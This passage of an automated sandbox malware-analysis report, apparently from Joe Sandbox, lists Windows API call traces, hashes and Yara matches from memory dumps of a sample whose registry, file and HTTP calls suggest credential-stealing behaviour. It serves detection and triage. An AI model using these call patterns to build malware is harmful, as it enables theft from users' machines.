                                                                                      • Part of subcall function 02D17537: HeapFree.KERNEL32(00000000), ref: 02D176C0
                                                                                    • lstrcat.KERNEL32(0064A668,004217FC), ref: 02D1786D
                                                                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 02D178AF
                                                                                    • lstrcat.KERNEL32(0064A668,00421800), ref: 02D178C1
                                                                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 02D178F6
                                                                                    • lstrcat.KERNEL32(0064A668,00421804), ref: 02D17907
                                                                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 02D1793A
                                                                                    • lstrcat.KERNEL32(0064A668,00421808), ref: 02D17954
                                                                                    • task.LIBCPMTD ref: 02D17962
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                                                    • String ID:
                                                                                    • API String ID: 2677904052-0
                                                                                    • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                                                    • Instruction ID: 3ec22e76d18f7d10df769e4296df3aac73ee512102b9db40de6e5c08c6c228e3
                                                                                    • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                                                    • Instruction Fuzzy Hash: 45312A79A40109BBEB04FBE0EC94DFEB77AEB59301F145118E142A77A0DA34AD46CB61
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02D15231
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D15238
                                                                                    • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 02D15251
                                                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 02D15278
                                                                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 02D152A8
                                                                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 02D152F1
                                                                                    • InternetCloseHandle.WININET(?), ref: 02D15320
                                                                                    • InternetCloseHandle.WININET(?), ref: 02D1532D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1008454911-0
                                                                                    • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                                                    • Instruction ID: 38f9d1a4bf3ee6ab9f306cbdc4ec4565efc5cb8bbdf393e59bb8e952427d4caf
                                                                                    • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                                                    • Instruction Fuzzy Hash: A93119B4A40218EBDB20CF94DC84BDCB7B5EB48704F5081D9E609A7280D7746EC5CF58
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA87: lstrlen.KERNEL32(02D1516C,?,?,02D1516C,00420DDE), ref: 02D2AA92
                                                                                      • Part of subcall function 02D2AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D2AAEC
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 02D258AB
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 02D25908
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 02D25ABE
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D25457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 02D2548F
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D25527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 02D2557F
                                                                                      • Part of subcall function 02D25527: lstrlen.KERNEL32(00000000), ref: 02D25596
                                                                                      • Part of subcall function 02D25527: StrStrA.SHLWAPI(00000000,00000000), ref: 02D255CB
                                                                                      • Part of subcall function 02D25527: lstrlen.KERNEL32(00000000), ref: 02D255EA
                                                                                      • Part of subcall function 02D25527: strtok.MSVCRT(00000000,?), ref: 02D25605
                                                                                      • Part of subcall function 02D25527: lstrlen.KERNEL32(00000000), ref: 02D25615
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 02D259F2
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 02D25BA7
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 02D25C73
                                                                                    • Sleep.KERNEL32(0000EA60), ref: 02D25C82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                    • String ID:
                                                                                    • API String ID: 3630751533-0
                                                                                    • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                                                    • Instruction ID: 92cdca6e2cb7ade0431f4e2f2dc05cb00790b4cc799cf2956f47d1eb68e79049
                                                                                    • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                                                    • Instruction Fuzzy Hash: 8BE12171910224EACB18FBA0ED95EED737AEF75704F808168A50666690EF345F4CCFA1
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D1158E
                                                                                      • Part of subcall function 02D11507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D1151B
                                                                                      • Part of subcall function 02D11507: RtlAllocateHeap.NTDLL(00000000), ref: 02D11522
                                                                                      • Part of subcall function 02D11507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 02D1153E
                                                                                      • Part of subcall function 02D11507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 02D1155C
                                                                                      • Part of subcall function 02D11507: RegCloseKey.ADVAPI32(?), ref: 02D11566
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D115B6
                                                                                    • lstrlen.KERNEL32(?), ref: 02D115C3
                                                                                    • lstrcat.KERNEL32(?,004262EC), ref: 02D115DE
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 02D116CC
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D19C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02D19C53
                                                                                      • Part of subcall function 02D19C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02D19C78
                                                                                      • Part of subcall function 02D19C27: LocalAlloc.KERNEL32(00000040,?), ref: 02D19C98
                                                                                      • Part of subcall function 02D19C27: ReadFile.KERNEL32(000000FF,?,00000000,02D116F6,00000000), ref: 02D19CC1
                                                                                      • Part of subcall function 02D19C27: LocalFree.KERNEL32(02D116F6), ref: 02D19CF7
                                                                                      • Part of subcall function 02D19C27: CloseHandle.KERNEL32(000000FF), ref: 02D19D01
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D11756
                                                                                    • memset.MSVCRT ref: 02D1177D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Similarity
                                                                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3885987321-0
                                                                                    • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                                                    • Instruction ID: 849a43d62539cd60e469288f848f69685a387c7d811920156033ca557f322133
                                                                                    • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                                                    • Instruction Fuzzy Hash: 96514FB5940229ABCB15FB60DD91EED737AEF64704F4041E8A60A62180EE305F89CFA5
                                                                                    APIs
                                                                                    • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,02E342B0,?,0042110C,?,00000000,?), ref: 0041696C
                                                                                    • sscanf.NTDLL ref: 00416999
                                                                                    • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,02E342B0,?,0042110C), ref: 004169B2
                                                                                    • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02E342B0,?,0042110C), ref: 004169C0
                                                                                    • ExitProcess.KERNEL32 ref: 004169DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$System$File$ExitProcesssscanf
                                                                                    • String ID: B
                                                                                    • API String ID: 2533653975-2248957098
                                                                                    • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                                                    • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                                                    • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                                                    • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                                                    APIs
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A51
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A68
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A7F
                                                                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02D14AA0
                                                                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??2@$CrackInternetlstrlen
                                                                                    • String ID: <
                                                                                    • API String ID: 1683549937-4251816714
                                                                                    • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                                                    • Instruction ID: 32ce14bce6c85d0d5ca6b10f13f6d7b64ab97cfc612c8f9dd119bbcf50c64065
                                                                                    • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                                                    • Instruction Fuzzy Hash: 11213BB5D00219ABDF14DFA4E849AED7B75FF44321F108225E925A7290EB706A09CF91
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2790B
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D27912
                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 02D27944
                                                                                    • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 02D27965
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 02D2796F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                    • String ID: Windows 11
                                                                                    • API String ID: 3225020163-2517555085
                                                                                    • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                    • Instruction ID: 69d4963d368854ef83568f91c9463ebbe42b518c55cbfd59f4da9e68acd83c54
                                                                                    • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                    • Instruction Fuzzy Hash: C2012CB9A80304BBEB10DBE4DD49FADB7B9EB48705F005155FA05A6280D6749904CB51
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,02E32968,00000000,00020119,00000000), ref: 004176DD
                                                                                    • RegQueryValueExA.ADVAPI32(00000000,02E39A28,00000000,00000000,?,000000FF), ref: 004176FE
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                    • String ID: Windows 11
                                                                                    • API String ID: 3466090806-2517555085
                                                                                    • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                    • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                                                    • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                    • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                                                    • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleSize
                                                                                    • String ID: :A$:A
                                                                                    • API String ID: 1378416451-1974578005
                                                                                    • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                    • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                                                    • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                    • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                                                    APIs
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02D175A1
                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02D17618
                                                                                    • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02D17674
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02D176B9
                                                                                    • HeapFree.KERNEL32(00000000), ref: 02D176C0
                                                                                      • Part of subcall function 02D194A7: vsprintf_s.MSVCRT ref: 02D194C2
                                                                                    • task.LIBCPMTD ref: 02D177BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                                                    • String ID:
                                                                                    • API String ID: 700816787-0
                                                                                    • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                                                    • Instruction ID: c449a7202a285c3f670833c2f07d78d60e3859507ed4bcfef5079f4f11eb4ccc
                                                                                    • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                                                    • Instruction Fuzzy Hash: E1614DB5900268ABEB24DB50DC54FE9B7B9FF44300F0081E9E689A6650DB709FC5CFA4
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D164E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02D16548
                                                                                      • Part of subcall function 02D164E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 02D1656A
                                                                                      • Part of subcall function 02D164E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02D1659C
                                                                                      • Part of subcall function 02D164E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02D165EC
                                                                                      • Part of subcall function 02D164E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02D16626
                                                                                      • Part of subcall function 02D164E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02D16638
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 02D2557F
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D25596
                                                                                      • Part of subcall function 02D29097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02D290B9
                                                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 02D255CB
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D255EA
                                                                                    • strtok.MSVCRT(00000000,?), ref: 02D25605
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D25615
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                    • String ID:
                                                                                    • API String ID: 3532888709-0
                                                                                    • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                                                    • Instruction ID: c394aa9606aff78ebadc60e1b54d17f1ec31088519c40ac902ad48bb5dfd0d49
                                                                                    • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                                                    • Instruction Fuzzy Hash: D751C870914258EBCB18EF60DE95EED7776EF20709F904018E90A66690EB34AF49CF61
                                                                                    APIs
                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 02D27345
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,02D27574,004205BD), ref: 02D27383
                                                                                    • memset.MSVCRT ref: 02D273D1
                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 02D27525
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: OpenProcesslstrcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 224852652-0
                                                                                    • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                                                    • Instruction ID: d4d80cb116c6d862c3a43c39d7ed73e299a2e9324bccb451ff0d91f6bf4b9c2f
                                                                                    • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                                                    • Instruction Fuzzy Hash: 33515FB0D00229DBEB24EB90DC84BEDF7B5EF54309F5081A9D115A6281EB746E88CF64
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D2433C
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 02D2435B
                                                                                    • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 02D2437F
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02D24389
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D243AE
                                                                                    • lstrcat.KERNEL32(?,0064A168), ref: 02D243C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                    • String ID:
                                                                                    • API String ID: 2623679115-0
                                                                                    • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                                                    • Instruction ID: a27dfc138f42c65fc57bcbea4d2fb68d552afb0308b3a362588c39b0c0df0e95
                                                                                    • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                                                    • Instruction Fuzzy Hash: A94166B6940118BBDB15EBE0DC45FEE737AEF59300F0045586B2997280EA759A8CCFE1
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 004140D5
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,02E3A2F0,00000000,00020119,?), ref: 004140F4
                                                                                    • RegQueryValueExA.ADVAPI32(?,02E39CC8,00000000,00000000,00000000,000000FF), ref: 00414118
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                                                    • lstrcatA.KERNEL32(?,02E3AF90), ref: 0041415B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                    • String ID:
                                                                                    • API String ID: 2623679115-0
                                                                                    • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                                                    • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                                                    • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                                                    • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                                                    APIs
                                                                                    • strtok_s.MSVCRT ref: 00413588
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • strtok_s.MSVCRT ref: 004136D1
                                                                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
                                                                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpystrtok_s$lstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3184129880-0
                                                                                    • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                                                    • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                                                    • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
